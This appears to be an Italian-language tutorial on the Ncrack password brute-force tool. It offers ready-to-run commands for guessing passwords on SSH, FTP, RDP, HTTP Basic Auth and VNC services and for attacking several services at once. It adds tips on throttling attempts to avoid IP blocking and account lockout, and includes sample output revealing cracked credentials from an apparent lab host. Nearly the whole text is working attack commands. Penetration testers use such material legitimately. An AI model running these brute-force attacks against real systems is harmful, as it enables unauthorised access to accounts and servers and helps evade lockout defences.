Ncrack è un potente tool di brute-force attack progettato per essere altamente scalabile e performante.
È sviluppato dagli stessi autori di Nmap, quindi è ottimizzato per la velocità e il multithreading.
✅ Perfetto per testare la sicurezza di grandi reti e servizi remoti.
✅ Più veloce di Hydra e Medusa su servizi come SSH, RDP, VNC, FTP, Telnet.
✅ Può attaccare più target contemporaneamente.
Sintassi di base di Ncrack
Il comando di base di Ncrack è:
ncrack -p <PORTA> -u <USERNAME> -P <WORDLIST> <TARGET>🔹 -p <PORTA> → Specifica la porta del servizio (es. 22 per SSH, 3389 per RDP).
🔹 -u <USERNAME> → Il nome utente da testare.
🔹 -P <WORDLIST> → La lista di password da provare.
🔹 <TARGET> → L’IP o dominio della vittima.
Se vuoi attaccare più target contemporaneamente, basta separarli con uno spazio:
ncrack -p 22 -u root -P rockyou.txt 192.168.1.10 192.168.1.11Attacco Brute-Force su SSH
ncrack -p 22 -u root -P /usr/share/wordlists/rockyou.txt 192.168.1.100✅ Prova a indovinare la password di root su SSH per l’host 192.168.1.100.
✅ Puoi aumentare la velocità con --max-parallelism per più tentativi simultanei.
Se SSH non è sulla porta 22, cambia porta con -p <PORT>:
ncrack -p 2222 -u root -P rockyou.txt 192.168.1.100🔹 Attacco Brute-Force su un server FTP
ncrack -p 21 -u admin -P /usr/share/wordlists/rockyou.txt 192.168.1.200✅ Tenta di scoprire la password dell’utente admin su un server FTP.
✅ Perfetto per testare server mal configurati.
🔹 Attacco Brute-Force su RDP (Remote Desktop Protocol)
ncrack -p 3389 -u Administrator -P rockyou.txt 192.168.1.150✅ Attacca un server Windows con RDP e username Administrator.
⚠ Attenzione: Molti sistemi Windows bloccano gli IP dopo troppi tentativi falliti.
🔹 Per evitare il blocco, riduci la velocità:
ncrack -p 3389 -u Administrator -P rockyou.txt 192.168.1.150 --max-attempts 3🔹 Attacco Brute-Force su un sito web (HTTP Login)
Se un sito web ha una pagina di login con autenticazione Basic Auth, puoi provare:
ncrack -v -T5 http://192.168.1.195/5ecure/ncrack -p 80 -u admin -P rockyou.txt http://192.168.1.50
ncrack -u joker -P /opt/wordlists/SecList/Passwords/Common-Credentials/10k-most-common.txt http://10.10.252.34:8080 -v
Starting Ncrack 0.7 ( http://ncrack.org ) at 2025-11-12 21:30 CET
Discovered credentials on http://10.10.252.34:8080 'joker' 'hannah'
http://10.10.252.34:8080 finished.
✅ Tenta il brute-force su un login HTTP (Basic Auth).
Per attacchi su form di login più avanzati, è meglio usare Hydra o BurpSuite.
🔹 Attacco Brute-Force su VNC
ncrack -p 5900 -u admin -P rockyou.txt 192.168.1.250✅ Tenta di accedere a un server VNC protetto da password.
🔹 Attacco su più protocolli contemporaneamente
Ncrack può attaccare più servizi allo stesso tempo!
Esempio: Attaccare SSH, FTP e RDP su un target:
ncrack -p 22,21,3389 -u root -P rockyou.txt 192.168.1.100🔹 SSH, FTP e RDP vengono attaccati contemporaneamente per massima efficienza.
4️⃣ Opzioni avanzate
A. Impostare il numero massimo di tentativi
ncrack --max-attempts 3 -p 22 -u root -P rockyou.txt 192.168.1.100🔹 Evita il blocco IP riducendo il numero di tentativi per password.
B. Limitare il numero di connessioni simultanee
ncrack --max-parallelism 4 -p 22 -u root -P rockyou.txt 192.168.1.100🔹 Riduce il numero di connessioni parallele per evitare il blocco dell’IP.
C. Usare una lista di username e password
Se hai una lista di username e una di password, usa:
ncrack -p 22 -U userlist.txt -P passlist.txt 192.168.1.100🔹 Prova combinazioni di username e password.